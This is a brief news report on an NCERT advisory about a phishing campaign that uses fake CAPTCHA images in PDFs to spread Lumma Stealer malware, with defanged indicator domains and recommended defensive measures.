Tech Desk 
Mar 05, 2025
The National Computer Emergency Response Team (NCERT) has issued a warning about a new phishing attack carried out through fake CAPTCHA images in PDF files to spread Lumma Stealer malware.
The cyberattack has affected thousands of users across the technology, finance, and manufacturing sectors in North America, Asia, and Southern Europe.
How hackers use fake CAPTCHA to attack user data?
Hackers are using search engine manipulation to distribute these malicious PDF files, which appear in search results on platforms like PDFCOFFEE, PDF4PRO, and Internet Archive.
When users open these files, they see a fake CAPTCHA image prompting them to click a link. This link redirects them to a phishing website, where cybercriminals steal financial data or install malware using PowerShell scripts.
What is Lumma Stealer malware?
The Lumma Stealer malware is a Malware-as-a-Service (MaaS) tool designed to steal login credentials, browser cookies, and cryptocurrency wallet information. It also installs GhostSocks, a proxy malware that hijacks the user's internet connection.
It is important to note that the stolen data is later sold on dark web forums like Leaky[.]pro. Some of the malicious domains linked to this attack include pdf-freefiles[.]com, webflow-docs[.]info, secure-pdfread[.]site, and docsviewing[.]net.
How to protect against cyber threats?
To protect against this cyber threat, NCERT advises organisations to educate employees about phishing, block malicious domains, and deploy advanced security tools.
Restricting PowerShell and MSHTA execution, enabling multi-factor authentication (MFA), and monitoring search engine results for fake websites are also recommended.
